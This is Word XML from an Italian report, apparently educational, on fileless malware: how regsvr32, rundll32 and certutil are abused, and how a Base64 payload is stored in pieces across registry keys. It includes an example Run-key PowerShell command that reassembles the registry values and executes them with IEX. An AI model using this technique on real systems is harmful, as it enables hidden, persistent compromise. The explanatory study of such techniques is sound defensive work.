          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>regsvr32.exe</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: Strumento destinato alla registrazione delle DLL, può essere abusato per scaricare ed eseguire script remoti direttamente in memoria. Essendo un binario Microsoft firmato, il suo utilizzo può eludere sistemi di controllo basati su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>whitelist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> applicative, rendendo l’attività meno sospetta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE21736" w14:textId="4F6E387D" w:rsidR="001A1FCA" w:rsidRPr="00B3023D" w:rsidRDefault="00B951B4" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>undll32.exe</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: È progettato per caricare ed eseguire funzioni contenute in librerie dinamiche. I malware fileless lo sfruttano per richiamare DLL di sistema e forzarle a </w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00A82548">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>interpretare codice malevolo come se fosse una funzione legittima, mascherando l’esecuzione all’interno di un processo affidabile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F292B1E" w14:textId="5942A8A8" w:rsidR="00A82548" w:rsidRPr="00F5206B" w:rsidRDefault="00BA07F1" w:rsidP="00A82548">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="E8E8E8" w:themeColor="background2"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ertutil.exe</w:t>
      </w:r>
      <w:r w:rsidR="001A1FCA" w:rsidRPr="00B3023D">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>: Utile per la gestione dei certificati digitali, potrebbe essere utilizzato come strumento di download o di decodifica. Può prelevare contenuti da server remoti oppure convertire stringhe codificate in Base64 memorizzate nel Registro in payload eseguibili, contribuendo alla strategia di attacco senza generare file evidenti sul disco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359C2BA8" w14:textId="546EB326" w:rsidR="00F5206B" w:rsidRPr="00F5206B" w:rsidRDefault="00EE4510" w:rsidP="00F5206B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2 - </w:t>
      </w:r>
      <w:r w:rsidR="00F5206B" w:rsidRPr="00F5206B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Codice Malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1616C3FD" w14:textId="77777777" w:rsidR="00F5206B" w:rsidRPr="00F5206B" w:rsidRDefault="00F5206B" w:rsidP="00F5206B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Questa tecnica di "Payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Storing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>" si articola solitamente in due fasi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026971C4" w14:textId="572C0EA0" w:rsidR="00F5206B" w:rsidRPr="00F5206B" w:rsidRDefault="00F5206B" w:rsidP="00F5206B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Frammentazione e Offuscamento: Il codice malevolo (</w:t>
      </w:r>
      <w:r w:rsidR="004624DF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004624DF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004624DF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ad esempio</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">) viene codificato in formato </w:t>
      </w:r>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Base64</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> e spesso frammentato in più valori di registro per eludere i limiti di dimensione delle singole chiavi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E302A" w14:textId="19F4B9FB" w:rsidR="00F5206B" w:rsidRPr="00F5206B" w:rsidRDefault="00F5206B" w:rsidP="00F5206B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Mimetismo nei Dati: Il payload viene salvato all'interno di chiavi dai nomi apparentemente legittimi o in aree del registro poco monitorate (ad esempio sotto HKCU\Software\Classes\ o in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sottochiavi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> di telemetria).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CA8B6F" w14:textId="102D7309" w:rsidR="00F5206B" w:rsidRDefault="00F5206B" w:rsidP="00F5206B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Il registro agisce quindi come una memoria statica e persistente dove il virus risiede in forma di stringa testuale. Al momento dell'esecuzione, un comando minimo (il </w:t>
      </w:r>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00F5206B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>) preleva questa stringa, la ricompone e la inietta direttamente nella memoria RAM del sistema. Questo approccio rende il malware invisibile a una tradizionale analisi del file system, poiché l'intera logica dell'attacco esiste solo all'interno del database del registro</w:t>
      </w:r>
      <w:r w:rsidR="004624DF">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> di sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2EA7D" w14:textId="283E3F5C" w:rsidR="00EB6802" w:rsidRPr="00EB6802" w:rsidRDefault="00EB6802" w:rsidP="00EB6802">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Esempio di esecuzione tramite frammentazione:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA8A84" w14:textId="619718DF" w:rsidR="00EB6802" w:rsidRPr="00EB6802" w:rsidRDefault="00EB6802" w:rsidP="00EB6802">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>HKCU\Software\Microsoft\Windows\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>CurrentVersion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Telemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene salvato il valore ID contenente la prima metà del payload in Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0099E9" w14:textId="64C8A028" w:rsidR="00EB6802" w:rsidRPr="00EB6802" w:rsidRDefault="00EB6802" w:rsidP="00EB6802">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In HKCU\Software\Classes\Local\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene salvata la seconda metà</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F97C90" w14:textId="7432DD6A" w:rsidR="00EB6802" w:rsidRPr="00EB6802" w:rsidRDefault="00EB6802" w:rsidP="00EB6802">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nella chiave Run</w:t>
      </w:r>
      <w:r w:rsidR="007E0C17">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> di un software X</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> viene inserito il comando: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> "IEX (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>gp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'HKCU:\...\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>Telemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>').ID + (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>gp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'HKCU:\...\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>AppData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EB6802">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="darkBlue"/>
        </w:rPr>
        <w:t>).Value</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416439C3" w14:textId="3D08CF06" w:rsidR="007E0C17" w:rsidRPr="00AC7CF6" w:rsidRDefault="00EB6802" w:rsidP="007E0C17">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:id w:val="-303469538"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="71806EDA" w14:textId="60C35A18" w:rsidR="00EB6802" w:rsidRPr="007E0C17" w:rsidRDefault="004C1E3B" w:rsidP="007E0C17">
          <w:pPr>
            <w:pStyle w:val="Titolo1"/>
            <w:rPr>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00E97BB0">
            <w:rPr>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>Bibliografia</w:t>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:id w:val="111145805"/>
            <w:bibliography/>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w14:paraId="2627C1D3" w14:textId="77777777" w:rsidR="0041086B" w:rsidRPr="00E97BB0" w:rsidRDefault="004C1E3B" w:rsidP="00A82548">
              <w:pPr>
                <w:pStyle w:val="Bibliografia"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                  <w:kern w:val="0"/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w14:ligatures w14:val="none"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:instrText>BIBLIOGRAPHY</w:instrText>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:r w:rsidR="0041086B" w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:t xml:space="preserve">Microsoft. (2025, Gennaio 15). </w:t>
              </w:r>
              <w:r w:rsidR="0041086B" w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:t>Informazioni sul Registro di sistema di Windows per gli utenti esperti</w:t>
              </w:r>
              <w:r w:rsidR="0041086B" w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:t>. Tratto da Microsoft Learn: https://learn.microsoft.com/it-it/troubleshoot/windows-server/performance/windows-registry-advanced-users</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="5E4379D7" w14:textId="77777777" w:rsidR="0041086B" w:rsidRPr="00E97BB0" w:rsidRDefault="0041086B" w:rsidP="00A82548">
              <w:pPr>
                <w:pStyle w:val="Bibliografia"/>
                <w:ind w:left="720" w:hanging="720"/>
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve">Springer Nature. (2020). An emerging threat Fileless malware: a survey and research challenges. </w:t>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:i/>
                  <w:iCs/>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Springer Nature Link</w:t>
              </w:r>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:noProof/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>. Retrieved from https://link.springer.com/article/10.1186/s42400-019-0043-x</w:t>
              </w:r>
            </w:p>
            <w:p w14:paraId="4F4F581B" w14:textId="067A9828" w:rsidR="00A50725" w:rsidRPr="007E0C17" w:rsidRDefault="004C1E3B" w:rsidP="00A82548">
              <w:pPr>
                <w:rPr>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                  <w:u w:val="single"/>
                </w:rPr>
              </w:pPr>
              <w:r w:rsidRPr="00E97BB0">
                <w:rPr>
                  <w:b/>
                  <w:bCs/>
                  <w:sz w:val="26"/>
                  <w:szCs w:val="26"/>
                </w:rPr>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
      </w:sdtContent>
    </w:sdt>
    <w:sectPr w:rsidR="00A50725" w:rsidRPr="007E0C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DC90" w14:textId="77777777" w:rsidR="00372212" w:rsidRDefault="00372212" w:rsidP="00DE028B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="35333EDF" w14:textId="77777777" w:rsidR="00372212" w:rsidRDefault="00372212" w:rsidP="00DE0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773B" w14:textId="77777777" w:rsidR="00372212" w:rsidRDefault="00372212" w:rsidP="00DE028B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7440E8E6" w14:textId="77777777" w:rsidR="00372212" w:rsidRDefault="00372212" w:rsidP="00DE0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106"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="820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080C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BC8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2111C"/>
    <w:multiLevelType w:val="multilevel"/>
